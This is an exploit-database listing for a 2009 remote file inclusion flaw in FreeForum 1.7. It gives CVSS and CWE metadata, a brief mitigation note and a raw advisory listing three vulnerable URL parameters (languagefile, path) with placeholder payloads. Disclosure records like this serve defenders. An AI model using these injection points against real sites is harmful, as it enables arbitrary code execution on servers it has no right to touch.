header-logo
Suggest Exploit
vendor:
FreeForum
by:
indoushka
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: FreeForum
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: N/A
Related CWE: N/A
CPE: a:soft_zoneo:freeforum:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2009

FreeForum 1.7 RFI Vulnerability

FreeForum 1.7 is vulnerable to a Remote File Inclusion (RFI) vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The best way to mitigate RFI attacks is to ensure that user input is properly sanitized and validated. Additionally, applications should be configured to use the least privilege necessary to perform their functions.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : FreeForum 1.7 RFI Vulnerability                                         |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   :                                                                         |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : powered by FreeForum (FreeForum 1.7*http://soft.zoneo.net/freeForum/)   |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://localhost/freeforum-1.7/forum.php?languagefile=[EV!L]
|
| 2- http://localhost/freeforum-1.7/export.php?path=[EV!L]
|
| 3- http://localhost/freeforum-1.7/latestpost.php?path=[EV!L]
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR